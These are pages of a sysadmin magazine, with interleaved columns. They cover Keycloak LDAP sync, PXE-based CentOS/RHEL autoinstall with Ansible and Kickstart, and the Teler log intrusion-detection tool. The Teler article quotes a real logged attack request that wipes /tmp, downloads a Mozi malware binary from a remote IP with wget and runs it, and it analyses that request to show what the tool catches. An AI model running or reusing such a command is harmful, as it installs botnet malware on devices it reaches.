name for the application and the cli- appropriate permissions, test access, login (e.g., Google Authenticator), you
ent ID, selecting the protocol, and and save your changes. can set it up in Authentication. There,
entering the base URL, which must grab a shot of the QR code with the
be prefixed with relative paths. Once Synchronize with LDAP smartphone app, enter the currently
you have saved your input, you will generated code, and, for the sake of
be taken to other application settings The Mappers tab lets you map indi- clarity, assign a name to the device you
where you configure valid URLs for vidual LDAP attributes to Keycloak are using. Make sure that the times
forwarding after a successful login, attributes. To the default mappers, shown by your server and your de-
the lifetime of issued tokens, or – un- you can add others by pressing the vice are not too far apart. If you want
der Client Scopes – the attributes and Create button. You will need to create stricter time tolerance, you can config-
properties of the users your applica- a group-ldap-mapper if you want to ure this in the Administration Console
tion can access. In the standard case, map LDAP user groups to user groups under Authentication | OTP Policy.
all client scopes are assigned first. in Keycloak. Once set up, Keycloak Adjust the value for the Look Ahead
Other configuration of services and will do the group mapping for you, Window to suit your requirements.
the need to access individual user at- just as in LDAP.
tributes can be adapted to your envi- In Settings again, select the Synchro- Conclusions
ronment, and access can be tested. nize all users button at the bottom.
Remember that if you have a large In this article, you got to know Key-
Integrate LDAP directory, you will have to wait a few cloak as the central switchboard
moments until all users have been for your single sign-on. The test
Before you use an LDAP directory imported. If no users are imported for installation is already usable for
as a backend for authentication, you you, check the attribute settings. If synchronizing LDAP users and con-
can already create users in the Users this does not help, check the User Ob- necting applications. Beyond what
menu item. Therefore, Keycloak can ject Classes. Only entries with these is shown here, you will find many
theoretically even be used without a classes will be imported. As soon as more options for configuring identity
directory service in the background. the users are loaded from LDAP, you management in your organization.
To include an LDAP directory, go to will receive a message (Figure 1). You For example, you can also configure
User Federation and select Ldap from can see how many users have been passwordless login with WebAuthn
the drop-down list. In the following synchronized and how many failed to (FIDO2) for your users. n
dialog, enter the connection settings import.
for your LDAP server. Now you can check the imported us-
The recommendation for testing ers in the Users menu item. You will Info
purposes is to set the Edit mode to notice that all your users have been [1] Keycloak: [https://www.keycloak.org]
READ_ONLY first, so you do not over- assigned another internal Keycloak [2] Keycloak containers: [https://github.com/
write any settings in your directory. If ID. If you have imported a large num- keycloak/keycloak‑containers/]
you want to synchronize new regis- ber of users, you can use the Search [3] Container documentation:
trations through Keycloak with LDAP, box for a quick search. The Imperson- [https://github.com/keycloak/
check the Sync Registrations box. ate button lets you log in directly as a keycloak‑containers/blob/11.0.0/server/
Now select your LDAP backend type specific user. README.md]

Figure 1: Message confirming successful LDAP synchronization.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 65
M A N AG E M E N T Auto Install with PXE

Automate CentOS and RHEL installation with PXE

Pushbutton
Red Hat delivers an installer that lets you automate the installation of RHEL and CentOS in a preboot execution
environment. By Martin Loschwitz

Extensive frameworks for Puppet, Initial State DRBD and Pacemaker are discussed
Chef, Ansible, and Salt are found in elsewhere [1] [2], so this part of the
many setups for both automation To install the other systems automati- setup is left out here: It is not abso-
and configuration. What happens cally, you clearly require something lutely necessary anyway. If you can
once a system is installed and acces- like a manually installed nucleus. live with the fact that the deployment
sible over SSH is clearly defined by These systems are often referred to as of machines does not work if the VM
these frameworks, so how do you bootstrap nodes or cluster worksta- with the necessary infrastructure fails,
convince a computer to transition tions. Essentially, this is all about the you do not need to worry about high
to this state? Several tool suites deal infrastructure that enables the auto- availability at this point.
with the topic of bare metal deploy- matic installation of Red Hat or Cen- The basis for the system offering
ment in different ways; the installa- tOS, although it does not include as bootstrap services for newly installed
tion of the operating system, then, is many services as you might expect. All servers is CentOS in the latest version
part of a large task package that the that is really needed is working name from the 8.x branch, but the work
respective software processes, as if resolution, DHCP, trivial FTP (TFTP), shown here can be done with RHEL,
by magic. and an HTTP server that provides the as well.
Not everyone wants the overhead required files. If desired, Chrony or
of such solutions, but that doesn’t Ntpd can be added so that the freshly Installing Basic Services
mean you have to sacrifice conve- rolled out servers have the correct time.
nience. Linux systems can usually be In this article, I assume that all As the first step, you need to install
installed automatically by onboard services for the operation of an au- CentOS 8 and set it up to suit your
resources, without a framework or tomatic installation framework are requirements, including, among
Lead Image © Michael Kempf, Fotolia.com

complex abstraction. In this article, I running on one system. Ideally, this other things, storing an SSH key
show how Red Hat Enterprise Linux is a virtual machine (VM) that runs for your user account and adding
(RHEL, and by analogy CentOS) can on a high-availability cluster for re- it to the wheel group on the system
be installed automatically by the nor- dundancy reasons. This setup can be so that the account can use sudo.
mal tools of a Linux distribution with easily realized on Linux with onboard Additionally, Ansible should be ex-
a preboot execution environment resources by a distributed replicated ecutable on the infrastructure node.
(PXE). All of the tasks in the deploy- block device (DRBD) and Pacemaker. Although the operating system of the
ment chain are addressed. Both tools are available for CentOS. bootstrap system cannot be installed

66 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Auto Install with PXE M A N AG E M E N T

automatically, nothing can prevent


you from using Ansible for rolling
out the most important services on
this system itself to achieve repro-
ducibility.
Assume you have a CentOS 8 system
with a working network configura-
tion, a user who can log in over SSH
and use sudo, and Ansible, so that
the command ansible‑playbook can
be executed. To use Ansible, the tool
expects a specific structure in your
local directory, so the next step is to
create a folder named ansible/ in the
home directory and then, below this
folder, the roles/, group_vars/, and
host_vars/ subfolders.
You also need to create in an editor
an inventory for Ansible. For this Figure 1: Automation is useful when it comes to setting up the infrastructure node. Thanks
purpose, create the hosts file with the to ready-made roles, the Ansible setup is completed quickly.
content:
VM> cd roles with meaningfully selected defaults
[infra] VM> git clone https://github.com/bertvv/U for CentOS and sets up the TFTP
<full_hostname_of_the_Ansible_system> U ansible‑role‑tftp bertvv.tftp server such that its root directory re-
ansible_host=<Primary_IP_of_the_system> U VM> git clone https://github.com/bertvv/U sides in /var/lib/tftpboot/, which is
ansible_user=<login_name_of_admin_user> U ansible‑role‑dhcp bertvv.dhcp in line with the usual Linux standard.
ansible_ssh_extra_args='‑o U As soon as the two roles are available
StrictHostKeyChecking=no' In the file host_vars/‑<Hostname_of_ locally and you have stored a con-
infrastructure_system>.yml, save the figuration for DHCP in the host vari-
The entire entry after [infra] must be configuration of the DHCP server as ables, you need to create an Ansible
one long line. You can check whether shown in Listing 1. It is important to playbook that calls both roles for the
this works by calling get the hostname exactly right. If the infrastructure host. In the example,
full hostname of the system is infra‑ the playbook is:
ansible ‑i hosts infra ‑m ping structure.cloud.internal, the name
of the file must be infrastructure. ‑ hosts: infra
If Ansible then announces that the cloud.internal.yml. Additionally, the become: yes
connection is working, everything is values of the subnet configured in the roles:
set up correctly. file, the global address of the broad- ‑ bertvv.dhcpd
cast, and the address of the PXE boot ‑ bertvv.tftp

Configure DHCP and TFTP server need to be adapted to the local


conditions. Listing 1: Host Variables
Your next steps are to get the required The subnet must be a subrange of dhcp_global_domain_name: cloud.internal
services running on the infrastructure the subnet where the VM with the in- dhcp_global_broadcast_address: 10.42.0.255
VM. DHCP, TFTP, and Nginx are all it frastructure services itself is located.
takes to deliver all the required files However, when configuring the range, dhcp_subnets:
to requesting clients. you need to make sure the addresses ‑ ip: 10.42.0.0
Of course, you can find ready- that the DHCP server assigns to re- netmask: 255.255.255.0
made Ansible roles for CentOS- and questing clients do not collide with domain_name_servers:
RHEL-based systems that set up IPs that are already in use locally. It is ‑ 10.42.0.10
DHCP and TFTP, and I use two also important that the value of dhcp_ ‑ 10.42.0.11
roles from Dutch developer Bert pxeboot_server reflects the IP address range_begin: 10.42.0.200
van Vreckem, because they work of the infrastructure VM (Figure 2); range_end: 10.42.0.254
well and can be launched with very otherwise, downloading the required ntp_servers:
little effort (Figure 1). In the roles/ files over TFTP will fail later. ‑ 10.42.0.10
‑ 10.42.0.11
subfolder check out the two Ansible TFTP is far less demanding than
modules from Git (installed with DHCP in terms of its configuration.
dhcp_pxeboot_server: 10.42.0.12
dnf ‑y install git): Bert van Vreckem’s module comes

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 67
M A N AG E M E N T Auto Install with PXE

execute the ansible‑playbook com-


mand again. Of most import here is
that the /srv/data/ be created on the
infrastructure node, either manually
or by the playbook. The folder needs
to belong to the >nginx user and
the nginx group so that Nginx can
access it.

Enabling PXE Boot


Figure 3: The Playbook for the A specific series of commands enable
infrastructure services is simple in its PXE booting of the systems. Here, I
Figure 2: For the DHCP role to know how final form – even if the configuration for assume that the unified extensible
to set up the DHCP daemon (dhcpd), GRUB and Kickstart can be generated firmware interface (UEFI) with the se-
you need to define the configuration in automatically by Ansible. cure boot function is enabled on the
the host variables of the server with the target systems.
infrastructure services. The individual work steps of the The boot process will later proceed
two Playbooks then flash by on your as follows: Configure the system
Basically, for the Playbooks added in screen. with the intelligent platform man-
this article, you need to add a new If you are wondering why I do not agement interface (IPMI) – or man-
line with the appropriate value to go into more detail concerning the ually – for a network or PXE boot.
the entries in roles. The role’s name configuration of the firewall (i.e., To do this, the system first sends a
matches that of the folder in the firewalld), the chosen roles take DHCP request, which also contains
roles/ directory (Figure 3). care of this automatically and open the file name of the bootloader in
the required ports for the respective its response. The PXE firmware
DHCP and TFTP Rollout services. The use of Ansible and the of the network card then queries
prebuilt modules definitely saves you this and, once it has loaded the
Now it’s time to get down to busi- some work. bootloader locally, executes it. The
ness. Ansible is prepared well enough bootloader then reloads its configu-
to roll out the TFTP and DHCP serv- Move Nginx into Position ration file.
ers. You need to enforce this by typ- Depending on the requesting MAC
ing the command: Not all files for the automated RHEL or address, the bootloader configura-
CentOS installation can be submitted tion can be influenced, which is very
ansible‑playbook ‑i hosts infra.yml to the installer over TFTP. That’s not important for the configuration of the
what the protocol is made for. You need finished system. First, however, you
Listing 2: Nginx Configuration to support your TFTP service with an will be interested in configuring the
nginx_http_template_enable: true Nginx server that can host the Kickstart basics of the whole process. Conve-
nginx_http_template: files for Anaconda, for example. niently, the chosen DHCP role already
default: A prebuilt Ansible role for this job, configured the DHCP server to always
template_file: http/default.conf.j2 directly from the Ansible develop- deliver pxelinux/shimx64.efi as the
conf_file_name: default.conf ers, works wonderfully on CentOS filename for the bootloader to UEFI
conf_file_location: /etc/nginx/conf.d/ systems. Just clone the role into the systems.
servers: roles/ folder: In the first step, create under /var/
server1: lib/tftpboot/ the pxelinux/ subdirec-
list: $ cd roles tory; then, create the centos8/ and px‑
listen_localhost: $ git clone https://github.com/nginxinc/U elinux.cfg/ subdirectories below that.
port: 80 ansible‑role‑nginx nginxinc.nginx Next, copy the /boot/efi/EFI/centos/
server_name: infrastructure.cloud.internal shimx64.efi file to the pxelinux/
autoindex: true After that, open the host_vars/Host‑ folder. If it is not in place, also install
web_server: name.yml file again and save the con- the shim‑x64 package.
locations: figuration for Nginx (Listing 2). The The pxelinux/ folder also needs to
default: entry for server_name needs to match contain the grubx64.efi file, which
location: / the full hostname of the infrastructure you will find online [3]. While
html_file_location: /srv/data system. you are on the CentOS mirror, you
autoindex: true Now add the nginxinc.nginx role you can load the two files found in the
cloned to the infra.yml playbook and pxeboot directory (initrd.img and

68 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Auto Install with PXE M A N AG E M E N T

vmlinuz) [4] and store them in pxe‑ MAC Trick inst.ks=http://172.23.48.31/kickstart/U


boot/centos8/. ks01‑0c‑42‑a1‑06‑ab‑ef.cfg
Still missing is a configuration file for You can approach this problem in
GRUB that tells it which kernel to use. several ways. Networking is a tricky In this case, Anaconda will no longer
In the pxeboot/ folder, store the grub. subject, because it has several po- download the generic ks.cfg, but the
cfg file, which follows the pattern tential solutions. Conceivably, for
shown in Listing 3. example, you could pack configured Listing 3: Generic GRUB Config
If you were to run a server through systems into their own VLAN at the set default="0"
the PXE boot process, it would get a switch level and have the system con-
function load_video {
bootloader, a kernel, and an initramfs. figured accordingly by the Anaconda
insmod efi_gop
However, the Kickstart file (Listing 4) autoinstaller. Another DHCP server insmod efi_uga
is still missing. on the network could then be set up insmod video_bochs
If you want to know which format for this VLAN so that it assigns suit- insmod video_cirrus
the password in the user (line 21) and able IP addresses. insmod all_video
rootpw (line 13) lines must have, you Also conceivable would be to store }
can find corresponding information a suitable Kickstart configura-
load_video
online [5]. Save the file as ks.cfg in tion for each host containing the
set gfxpayload=keep
the /srv/data/kickstart/ directory on desired network configuration. A insmod gzio
the infrastructure host; then, set the trick comes in handy in this case: insmod part_gpt
permissions to 0755 so that Nginx can Once the system launches, the insmod ext2
access the file. GRUB bootloader does not first
After completing this step, you will be search for the grub.cfg file, but set timeout=10
able to PXE boot a 64-bit system with for a file named grub.cfg‑01‑<MAC_
menuentry 'Install CentOS 8' ‑‑class centos ‑‑class
UEFI and secure boot enabled. How- for_requesting_NIC> (e.g., grub.
gnu‑linux ‑‑class gnu ‑‑class os {
ever, at the moment, you will encoun- cfg‑01‑0c‑42‑a1‑06‑ab‑ef). With the linuxefi pxelinux/centos8/vmlinuz devfs=nomount
ter one catch: The installed systems inst.ks parameter, you define which method=http://mirror.centos.org/centos/8/BaseOS/
want to pick up their IP addresses Kickstart file the client sees after x86_64/os inst.ks=http://172.23.48.31/kickstart/
over DHCP, and the default Kickstart starting the installer. ks.cfg
template assumes that all servers use In the example here, the GRUB config- initrdefi pxelinux/centos8/initrd.img
}
the same hardware layout. uration could contain the parameter:

Listing 4: Sample Kickstart Config


01 ignoredisk ‑‑only‑use=sda 24 bootloader ‑‑location=mbr ‑‑boot‑drive=sda ‑‑driveorder=sda
02 # Use text install 25 clearpart ‑‑all ‑‑initlabel ‑‑drives=sda
03 text 26 part pv.470 ‑‑fstype="lvmpv" ‑‑ondisk=sda ‑‑size 1 ‑‑grow
04 # Keyboard layouts 27 part /boot ‑‑size 512 ‑‑asprimary ‑‑fstype=ext4 ‑‑ondisk=sda
05 keyboard ‑‑vckeymap=at‑nodeadkeys ‑‑xlayouts='de (nodeadkeys)','us' 28 volgroup cl ‑‑pesize=4096 pv.470
06 # System language 29 logvol /var ‑‑fstype="xfs" ‑‑size=10240 ‑‑name=var ‑‑vgname=cl
07 lang en_US.UTF‑8 30 logvol / ‑‑fstype="xfs" ‑‑size=10240 ‑‑name=root ‑‑vgname=cl
08 # Network information 31 logvol swap ‑‑fstype="swap" ‑‑size=4096 ‑‑name=swap ‑‑vgname=cl
32 reboot
09 network ‑‑device=bond0 ‑‑bondslaves=ens1f0,ens1f1
33
‑‑bondopts=mode=802.3ad,miimon‑100 ‑‑bootproto=dhcp ‑‑activate
34 %packages
10 network ‑‑hostname=server.cloud.internal
35 @^server‑product‑environment
11 network ‑‑nameserver=10.42.0.10,10.42.0.11
36 kexec‑tools
12 # Root password
37 %end
13 rootpw ‑‑iscrypted <Password>
38
14 # Run the Setup Agent on first boot
39 %addon com_redhat_kdump ‑‑enable ‑‑reserve‑mb='auto'
15 firstboot ‑‑enable
40 %end
16 # Do not configure the X Window System
41
17 skipx 42 %anaconda
18 # System timezone 43 pwpolicy root ‑‑minlen=6 ‑‑minquality=1 ‑‑notstrict ‑‑nochanges
19 timezone Europe/Vienna ‑‑isUtc ‑‑ntpservers 172.23.48.8,172.23.48.9 ‑‑notempty
20 # user setup 44 pwpolicy user ‑‑minlen=6 ‑‑minquality=1 ‑‑notstrict ‑‑nochanges
21 user ‑‑name=example‑user ‑‑password=<Password> ‑‑iscrypted ‑‑emptyok
‑‑gecos="example‑user" 45 pwpolicy luks ‑‑minlen=6 ‑‑minquality=1 ‑‑notstrict ‑‑nochanges
22 # Disk partitioning information ‑‑notempty
23 zerombr 46 %end

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 69
M A N AG E M E N T Auto Install with PXE

variant specifically geared for the method or inst.ks in the kernel com- Netbox, a tool that has already been
host. You can then follow the Ana- mand line (Figure 4). discussed several times in ADMIN [7],
conda manual if you want to config- If you have prepared an Anaconda is a combined datacenter inventory
ure static IP addresses. configuration, you can look forward management (DCIM) and IP address
In this context it is helpful to think to finding a system with the appropri- management (IPAM) system. Netbox
of a mechanism to put both the ate parameters afterward. The Ana- (Figure 5) lists the servers in your
required grub.cfg files and the Kick- conda template I looked at here by no data center, as well as the IPs of
start files in place. Ansible’s tem- means exhausts all of the program’s your various network interface cards
plate functions can help enormously possibilities. You could also configure (NICs). If you take this to its ultimate
here; then, you can build your own sudo in Anaconda or store an SSH conclusion, you can generate the
role containing a template for grub. key for users so that a login without configuration file for the DHCP server
cfg and ks.cfg and store the param- a password works. However, I advise from Netbox, as well as the Kickstart
eters to use for each host in your you to design your Kickstart tem- files for individual systems.
configuration in the two templates. plates to be as clear-cut and simple Extracting individual values from
Afterward, you would use the tem‑ as possible and leave the rest to an Netbox is not at all complicated
plate function in Ansible to put the automation expert. because the service comes with a
populated files in the right place on REST API that can be queried au-
the filesystem. For each host stored Extending the Setup tomatically. What’s more, a library
in the Ansible configuration, you acts as a Netbox client especially
would always have a functional,
Retroactively for Python so that values can be
permanently stored autoinstallation Up to this point, this article has queried from Netbox and processed
configuration. You will find more worked out how you can convert directly in a Python script. Anyone
details of this in the Anaconda docu- bare metal into an installed base planning a really big leap in auto-
mentation [6]. system. Although automation is mation will be looking to move in
good, more automation is even bet- this direction and will ultimately
Postinstallation Process ter. What you therefore need is to use tags in Netbox to assign specific
implement the last small piece of tasks to certain systems.
The main actor in the process (Ana- the installed basic system up to the A Netbox client that regularly queries
conda) has only been implicitly men- step where the system automatically the parameters of the servers in Net-
tioned thus far, but the credit goes becomes part of the automation. In box can then generate specific Kick-
to Anaconda, which is part of the Ansible-speak, this objective would start files according to these details
CentOS and RHEL initramfs files and be met once a host automatically ap- and ensure that, for example, a spe-
automatically appears as soon as you peared in the Ansible inventory after cial set of packages is rolled out on
specify an Anaconda parameter like the basic installation. one system but not on another. The
overhead is rewarded with a work-
flow in which you simply bolt a com-
puter into the rack, enter it in Netbox,
and tag it appropriately to complete
the installation in a completely auto-
mated process.
If you want things to be a little less
complicated, you might be satisfied
with an intermediate stage. Many au-
tomators, including Ansible, can now
generate their inventory directly from
Netbox. As soon as a system appears
in Netbox, it is also present in the
inventory of an environment, and the
next Ansible run would include that
new server.

Conclusions
Installing Red Hat or CentOS au-
tomatically with standard tools is
Figure 4: Anaconda either runs at the command line or graphically, but it does not affect neither rocket science nor a task
the installed system. that requires complex frameworks.

70 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Auto Install with PXE M A N AG E M E N T

If you are confident working at the as Netbox with an API that can be BaseOS/x86_64/os/images/pxeboot/]
console, you will have no problems queried prove to be extremely useful, [5] Passwords in Anaconda:
whatsoever setting up the necessary even if their initial setup is often [https://thornelabs.net/posts/hash-roots-
components. difficult and tedious. n password-in-rhel-and-centos-kickstart-
Combining the automation in your profiles.html]
own setup with Anaconda so that Info [6] Anaconda installs:
newly installed systems become part [1] DRBD on CentOS: [https://www. [https://docs.fedoraproject.org/en-US/
of your automation is also useful. howtoforge.com/tutorial/how-to-install- fedora/rawhide/install-guide/install/
Although Kickstart files provide sec- and-setup-drbd-on-centos-6/] Installing_Using_Anaconda/]
tions for arbitrary shell commands [2] “Automated Monitoring with Pacemaker [7] Netbox: [https://www.admin-magazine.
that need to be called before, during, Resource Agents” by Martin Loschwitz, com/content/search?SearchText=Netbox&
or after the installation, in theory, Linux Magazine, issue 139, June 2012, pg. x=0&y=0]
even configuration files of arbitrary 14, [https://www.linuxpromagazine.com/
programs can be rolled out in this Issues/2012/139/Pacemaker] The Author
way. In practice, however, it is a [3] grubx64.efi: [http://mirror.centos.org/ Martin Gerhard Loschwitz is Cloud Platform
good idea to leave this work to au- centos/8/BaseOS/x86_64/os/EFI/BOOT/] Architect at Drei Austria (Vienna) and works
tomation engineers who specialize [4] CentOS pxeboot files: on topics such as OpenStack, Kubernetes,
in the task. Inventory systems such [http://mirror.centos.org/centos/8/ and Ceph.

Figure 5: Netbox is a combination of DCIM and IPAM and complements the combination of DHCP, TFTP, and HTTP.

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 71
M A N AG E M E N T Teler

Real-time log inspection

Inspector General
Teler is an intrusion detection and threat alert command-line tool that analyzes logs and identifies
suspicious activity in real time. By Chris Binnie

A perennial problem for any system On Your Marks for latest tag
operator is sifting through mountains kitabisa/teler info found version: 0.0.4 U

of logfiles that contain entries of To begin, I look at how you can in- for v0.0.4/linux/amd64
importance. However, when you’re stall Teler by a very simple route with kitabisa/teler info installed U

presented with half a million lines in a a precompiled binary; then, I’ll look /usr/local/bin/teler
single logfile full of differing content, at running it across some web server
you have little hope of spotting attack logs that I have to hand. As you can see from the output of
data that may be of concern or, in fact, The prebuilt binary route can be in- the command, the tool was installed
partially or completely successful. stalled in one of two ways: in the expected path. To check
Numerous tools can help you sort the 1. by visiting the release page on it further, run the check version
wheat from the chaff in logfiles, such GitHub [3] and choosing the cor- command,
as the daily reporting provided by rect binary for your system, or
the excellent Logwatch [1]. Although 2. with the use of a handy instal- $ teler ‑v
these tools are ideal for a small num- lation script that pulls down the teler 0.0.4
ber of entries, few offer analysis in binary and then saves it to your
real time with the sophistication of user path (in this case, /usr/lo‑ and to see the help options, use the
Teler, a “real-time HTTP intrusion de- cal/bin). ‑h switch (Figure 1).
tection” tool [2]. If you choose the second method, for You can also build the binary yourself
Judging by the age of the commits on prudence, you should download the from source:
its GitHub page, it’s a relatively new script first with curl (to scrutinize the
project, but I found its uncomplicated script for malicious intent, omit the $ git clone U

ingenuity exceptionally intriguing. If section after the pipe (|) before run- https://github.com/kitabisa/teler
Lead Image © bowie15, 123RF

you visit the GitHub page, you can ning it in its entirety): $ cd teler
see multiple command-line screen $ make build
recordings of Teler in action to whet $ curl ‑sSfL U $ mv ./bin/teler /usr/local/bin
your appetite. In this article, I look at 'https://ktbs.dev/get‑teler.sh' | U

installation options and use cases for sh ‑s ‑‑ ‑b /usr/local/bin I have to admit that I had less luck
the excellent Teler. kitabisa/teler info checking GitHub U trying to use the Docker container

72 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Teler M A N AG E M E N T

Teler if you get the Docker command


working:

$ cat apache.log | docker run ‑i ‑‑rm ‑e U

TELER_CONFIG=./teler.yaml kitabisa/teler

I will leave you to get the container


route working and instead use the
prebuilt binary.

Expanding The Horizon


The most important thing to get cor-
rect with Teler is the configuration side
of things. A suitably named example
file is available online [5]. If you look
at the top stanza of that file, you will
see that you are dutifully directed to a
Figure 1: The help output from Teler, in hand with some welcome ASCII art. GitHub page for the configuration sec-
tion, followed by the log format you
as the installation route. I confirmed Docker command to include an envi- want to inspect (Listing 1).
that the container was valid, but the ronment variable, Within the configuration section of
way it was built meant I couldn’t the documentation, you are offered
execute commands inside a running $ docker run ‑i ‑‑rm ‑e TELER_CONFIG=U a number of popular logfile formats.
container easily to see what I was /root/teler.yaml kitabisa/teler U More than 20 years ago I remember
missing, in terms of passing config- ‑i apache.log some of the standardization issues
uration to the binary correctly. I did with the web server logging format
manage to get some meaningful er- where the ‑i (input) switch is a prere- and wrangling with some applica-
rors back from the binary inside the corded logfile or logfiles. tions that should have supported
container, but ultimately, I didn’t You can also buffer real-time data to the NCSA format (named after the
want to spend too much
time on it. Listing 1: teler.example.yaml (partial)
If you go down that route,
# To write log format, see https://github.com/kitabisa/teler#configuration
you will probably want to
log_format: |
install Docker Engine Com- $remote_addr ‑ [$remote_addr] $remote_user ‑ [$time_local]
munity Edition and follow "$request_method $request_uri $request_protocol" $status $body_bytes_sent
the official instructions [4] "$http_referer" "$http_user_agent" $request_length $request_time
to get started. You can then [$proxy_upstream_name] $upstream_addr $upstream_response_length $upstream_response_time $upstream_status $req_id
start by pulling the relevant
container image with the
command: Listing 2: Teler Rule Options

rules:
$ docker pull kitabisa/teler cache: true
threat:
To tell the container the lo- excludes:
cation of the configuration # ‑ "Common Web Attack"
file, you can use either the # ‑ "Bad IP Address"
command, # ‑ "Bad Referrer"
# ‑ "Bad Crawler"
$ export U # ‑ "Directory Bruteforce"

TELER_CONFIG="/root/teler.yaml"
# It can be user‑agent, request path, HTTP referrer, IP address and/or request query values parsed in regExp
whitelists:
a shell-wide environment
# ‑ "(curl|Go‑http‑client|okhttp)/*"
variable (sometimes this # ‑ "^/wp‑login\\.php"
path refers internally to a # ‑ "https://www\\.facebook\\.com"
container path, so it might # ‑ "192\\.168\\.0\\.1"
not work as expected), or the

W W W. A D M I N - M AGA Z I N E .CO M A D M I N 61 73
M A N AG E M E N T Teler

National Center for Supercomput- to Teller resource collections, where create the correct log_format entry, I
ing Applications) [6]. These days, you can see a list of projects (Fig- just walked through each component
however, along with a little help from ure 2) that assisted in the intelligence of that line and matched the format
the documentation, of course, it’s feed that powers Teler, along with the shown, making sure that double
possible to pin down logfiles for the author’s gratitude for their involve- quotes were present where needed.
following applications and services ment in the project in whatever form Watch out, though, because they’re
for relatively easy use with Teler: that takes. not always there.
Apache, Nginx, Nginx Ingress, AWS Having pointed the trusty Teler at that
S3, AWS Elastic Load Balancers, and Dropping Science logfile, I was a little surprised at how
AWS CloudFront. much data was reported back. In Fig-
Teler has been carefully constructed, Now that you have seen how to in- ure 3 you can see the very top of the
and if it’s starting out its develop- stall and where to configure Teler, output from the command:
ment with support for numerous ap- you can try running Teler with your
plications and services, it would be configuration file, having adapted the $ teler ‑i apache.log ‑c teler.yml U

wise to watch this space for future one from the GitHub repository [5]. ‑o threats.txt
versions. Save your configuration file locally as
Listing 2 shows off the settings avail- teler.yml (my preference on Linux is I chose to output to a file called
able for applying various rules to the shortened filename extension). threats.txt in addition to STDOUT.
logfile inspection. As you can see, Listing 3 shows the configuration The redacted output is missing the IP
it’s possible to whitelist and ignore file that I created, replacing the top addresses and is obviously not a clear
certain entries parsed by Teler and stanza with my specific Apache log- example of how rapidly the excellent
exclude certain findings within your file format. Teler can process web server logs.
logfiles. That the first line in Listing 3 is all To give you an idea of what to expect
Another option caches rules in the one long line is not precisely clear. from Teler and how useful it can be
YAML file: It’s commented out for reference. To for spotting HTTP-related attacks, I’ll

rules:
cache: true

The documentation says that if you


do not want Teler to look up what it
calls “external resources” each time
it runs, you should enable the above
caching. I found it a little unneces-
sary for testing and kept wiping the
cache clean before trying something
else with the command:
Figure 2: These projects help update the Teler intelligence feed [7].
$ teler ‑‑rm‑cache

A note in the docs ex-


plains that the cache
of information will be
updated once a day
if cache: true is en-
abled. To understand
the purpose of external
resources related to the
cache, you are pointed Figure 3: The top part of the output analyzing the Apache logfile (redacted to protect the innocent).

Listing 3: log_format in Config File

# 68.XXX.XXX.XXX ‑ ‑ [22/Nov/2020:11:03:36 +0100] "GET /wp‑login.php HTTP/1.1"


401 673 "‑" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0"

log_format: |
$remote_addr ‑ ‑ [$time_local] "$request_method $request_uri $request_protocol" $status $body_bytes_sent "‑" "$http_user_agent"

74 A D M I N 61 W W W. A D M I N - M AGA Z I N E .CO M
Teler M A N AG E M E N T

dissect some of the threats.txt file &todo=syscmdU box. If you want to experiment with
that I created with that scan. &cmd=rm+‑rf+/tmp/*;wget+U real-time log scanning – as opposed
I mentioned that Figure 3 didn’t dem- http://60.211.7.17:41606/Mozi.m+‑O+U to reading from saved logfiles – then
onstrate how quick Teler was to react /tmp/netgear;sh+netgearU the docs point you to stdbuf [8],
to the injected logfile. According to the &curpath=/&currentsetting.htm=1 which is a command to pull in data in
word count command (wc), the com- a stream:
bined input logfiles were 45,836 lines You can see the netgear.cfg file being
long, from which Teler found 10,249 probed – in fact, written to. If it was $ tail ‑f access.log | U

issues worth noting. Teler definitely being queried, it would probably be stdbuf ‑oL cut ‑d aq aq ‑f1 | uniq
moved like lightning through the pars- for useful version or exploit informa-
ing of the ca. 45K-long logfiles. tion. That request definitely does not With the tail command, it is possible
The results were unsurprising be- look good for a standard web server to format the entries into a useful lay-
cause of the traffic breakdown of the request. Moreover, because the /tmp out that scripts and other applications
sites on that quiet web server, with directory is presumably being written can use.
logs that span a long period of time to, it means it’s not a novice that has I will be keeping an eye on Teler as
in which multiple bots, nefarious crafted that request. Of course, it's new features and supported formats
scans, and crawlers would have been also possible that someone who knew are developed in later versions. n
logged. their stuff might have written the re-
The file revealed a large number of quest and less experienced miscreants
brute-force attacks that appear to be are running automated scans with it. Info
PHP related (which is enabled on that Using a command to filter out crawler [1] Logwatch: [https://www.admin‑magazine.
